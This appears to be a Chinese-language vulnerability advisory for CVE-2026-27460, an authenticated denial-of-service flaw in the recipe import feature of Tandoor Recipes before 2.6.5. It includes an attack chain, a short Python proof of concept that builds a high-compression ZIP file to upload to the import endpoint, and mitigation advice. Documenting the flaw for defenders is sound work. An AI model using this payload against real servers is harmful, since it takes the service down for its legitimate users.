CVE-2026-27460 CVSS 6.5 中危

CVE-2026-27460 Tandoor Recipes拒绝服务漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27460

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tandoor Recipes

漏洞概述

Tandoor Recipes是一个用于管理食谱、规划膳食和构建购物列表的应用程序。在2.6.5版本之前，其食谱导入功能中存在一个关键的拒绝服务漏洞。经过身份认证的攻击者可以通过上传恶意的大型ZIP文件（ZIP炸弹）来利用此漏洞，从而导致服务器崩溃或性能显著下降。

技术细节

该漏洞位于Tandoor Recipes的食谱导入模块中。在2.6.5版本之前，系统在处理用户上传的ZIP文件进行解压时，缺乏对解压后数据大小的有效限制和安全校验。攻击者可以利用低权限账户，构造并上传一个恶意的“ZIP炸弹”（即压缩比极高、解压后体积巨大的文件）。当服务器尝试解压并解析该文件内容时，文件会在瞬间释放大量数据，迅速耗尽服务器的磁盘空间、内存和CPU资源。这种资源耗尽会导致服务器进程崩溃或服务响应极其缓慢，从而实现拒绝服务攻击。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在使用Tandoor Recipes应用程序，并获取一个有效的低权限用户账户。

STEP 2

2. 漏洞利用

攻击者登录系统，访问食谱导入功能，并上传预先构造好的恶意ZIP炸弹文件。

STEP 3

3. 资源耗尽

服务器在解压ZIP文件时，处理巨大的解压数据，导致CPU和内存资源迅速耗尽。

STEP 4

4. 拒绝服务

服务器进程崩溃或无法响应合法用户的请求，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import os

# PoC: Create a Zip Bomb to demonstrate the DoS vulnerability
# Generating a large file with repeating patterns for high compression ratio

def create_zip_bomb(output_filename, size_mb=100):
    # Create a temporary file with repeating data (high compression ratio)
    pattern = b'A' * 1024  # 1KB pattern
    temp_file = 'temp_large_file.bin'
    
    with open(temp_file, 'wb') as f:
        for _ in range(size_mb * 1024):
            f.write(pattern)
    
    # Compress the file into a zip
    with zipfile.ZipFile(output_filename, 'w', zipfile.ZIP_DEFLATED, compresslevel=9) as zipf:
        zipf.write(temp_file, arcname='recipe_data.txt')
    
    # Clean up the large file
    os.remove(temp_file)
    print(f"Zip bomb created: {output_filename}")
    print("Upload this file to the recipe import endpoint to trigger the DoS.")

if __name__ == "__main__":
    create_zip_bomb('malicious_recipes.zip')

影响范围

Tandoor Recipes < 2.6.5

防御指南

临时缓解措施

在未升级修复之前，建议管理员暂时禁用食谱导入功能，或者在反向代理（如Nginx）层面严格限制请求体的大小，防止恶意大文件上传。同时，监控服务器资源使用情况，以便及时发现异常。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表